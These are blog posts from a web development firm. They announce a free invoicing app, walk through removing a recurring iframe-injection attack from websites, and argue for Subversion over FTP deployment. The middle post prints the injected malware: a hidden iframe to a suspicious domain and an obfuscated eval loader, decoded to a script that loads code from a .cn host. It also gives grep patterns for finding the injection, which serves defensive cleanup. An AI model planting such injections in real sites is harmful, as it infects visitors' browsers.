On Nov. 23, we launched our free online invoicing application called Invoice Dude and I finally have the time to write about it. Invoice Dude is a free invoicing application to help you bill your clients with ease without spending any money or any kind of leasing-fee. As we’re mostly into custom web development for the clients, we had the idea from almost an year - but it was only few weeks back when our team finally committed to this project.

Invoice Dude is currently under private beta phase (which means accounts are limited) and once we get out of it, we’re going to launch some add-ons. The add-ons list is not yet decided however we invite community once again to take part in it and vote for the most needed add-ons.

We plan to launch such similar projects in near future and look forward to the feedback of community. If you have any suggestions regarding the software, please tell us.

I’ve spent many hours fixing this ongoing latest Iframe injection trend lately, And I’ve noticed one thing, every time our team fixes it up – it comes back in a new enhanced form which is difficult to delete automatically. Like the first time it began with:

<iframe src=”http://goooogleadsence.biz/?click=8F9DA” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

echo “<iframe src=\”http://goooogleadsence.biz/?click=8F9DA\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;

After that, code got better and less readable. And now the final version looks like this:

<!–

(function(KWaP){var hSgtJ=’:76a:72:20a:3d:22ScriptEngine:22:2c:62:3d:22:56:65rs:

69on()+:22:2cj:3d:22:22:2cu:3dn:61vigato:72:2eus:65:72:41gent:3bif((u:2einde:78Of(:

22Chrom:65:22):3c0:29:26:26(u:2e:69nd:65:78Of(:22Win:22):3e0):26:26(:75:2eindex:

4ff(:22:4eT:206:22):3c0):26:26(d:6f:63um:65nt:2ecookie:2ei:6edex:4ff(:22miek:3d1:

22):3c0):26:26:28:74y:70e:6f:66(:7arvz:74s:29:21:3dtyp:65:6ff:28:22A:22))):

7bz:72:76zt:73:3d:22A:22:3be:76al(:22if(:77indow:2e:22+:61+:22)j:3dj+:22+:61+:22:

4dajo:72:22+b+:61+:22Mi:6eo:72:22+b:2ba+:22B:75ild:22+:62+:22j:3b:22):

3bdocument:2ewrite(:22:3c:73:63r:69:70:74:20src:3d:2f:2fma:22:2b:22rt:75z:2e:63n:

2f:76i:64:2f:3f:69d:3d:22+j+:22:3e:3c:5c:2f:73cript:3e:22):3b:7d’;

eval(unescape(hSgtJ.replace(KWaP,’%')))})(/\:/g);

–>

Let’s reverse engineer it for fun. See that little evil eval()? Replace it by alert() or any other logger function like console.log() for Firebug. That will give us:

<!–

var a=”ScriptEngine”,b=”Version()+”,j=”",u=navigator.userAgent;if((u.indexOf(”Chrome”)<0)&&(u.indexOf(”Win”)>0)&&(u.indexOf(”NT 6″)<0)&&(document.cookie.indexOf(”miek=1″)<0)&&(typeof(zrvzts)!=typeof(”A”))){zrvzts=”A”;

eval(”if(window.”+a+”)j=j+”+a+”Major”+b+a+”Minor”+b+a+”Build”+b+”j;”);document.write(”<script src=//ma”+”rtuz.cn/vid/?id=”+j+”><\/script>”);}

–>

That *.cn domain is back again. To find this new injection, common pattern you need to lookup is as below:

3bdocument:2ewrite(:

Some other patterns you might want to check:

document.write(’<iframe

www.zj5173.com

How to clean your website?

Use ‘grep’ command or any other tool for Windows like PowerGrep. Other possible idea for an advanced user to avoid these attacks is to use a version control tool, and keep your site as a checked out copy. The advantage using this method is that you’ll know all the modified files just by issuing simple “svn status” command.

You can also contact us directly if you need assistance on this. We’ve helped securing over 50+ websites in last 3 months.

Not too long back my colleague asked community about how they handle their deployments and patches to the production server. We received quality response and various options – I learned many new things about how others were handling it. We are using Subversion for versioning our projects from last 3 years and were very happy to implement it. It reduced a lot of time in release cycle and all that hassle one has to go through, was simply gone.

But here comes the problem. The clients who are not willing to use such tools. Or are simply not giving you authorization to do so, or they are using shared hosting environment. I’ve seen this problem with my 5 out of 10 clients. They have a reason to stop you – they were never asked for this before from their previous development companies or whatsoever. Then, there are clients who say “Use ftp” when you ask them to send SSH access, this limits the productivity of the whole system and the project. However, I consider it as my call to make them aware of the things which can help them – and that is why I’m writing this post today.

So by this post, I actually want to highlight the advantages offered by any version control system over the regular FTP transfer for deployment – I’m sure this will help the buyers who don’t allow much control in hands of their web developers. Ok, here we go, these are some real BIG limitations you know you’ll face using FTP:

1. Initial setup is always easy, updating and bug fixes and applying patches is difficult using FTP. You spend 10x more time being careful for things that can be handled automatically.
2. You have to wait for the files to upload/download.
3. If something goes wrong, it’s really difficult to revert to “last stable” state.

And when you’re using Subversion or any other version control tool for that matter – All these issues are no more your concern, and you can focus on real development rather than finding files and stuff. Here are some advantages offered by a standard version control system:

1. To apply patches, you simply issue “svn up” command to the system (In case of subversion). It automatically updates the modified files.
2. In case there’s something wrong, you can go back to any old revision and have your site running as it was. Using Subversion’s advanced features and proper versioning; you can also define a “last stable” version and be safe all the times.
3. You don’t have to worry about latest back – everything is on a separate server with all revisions.

This is just a start – many things are eventually taken care of while using a version control. However, there are many other automated ways for this purpose, some people like using “rsync”, some rely on application servers and so.

I’m hoping that it’ll help buyers understand our offering better. Thanks for reading.

Abhimanyu Grover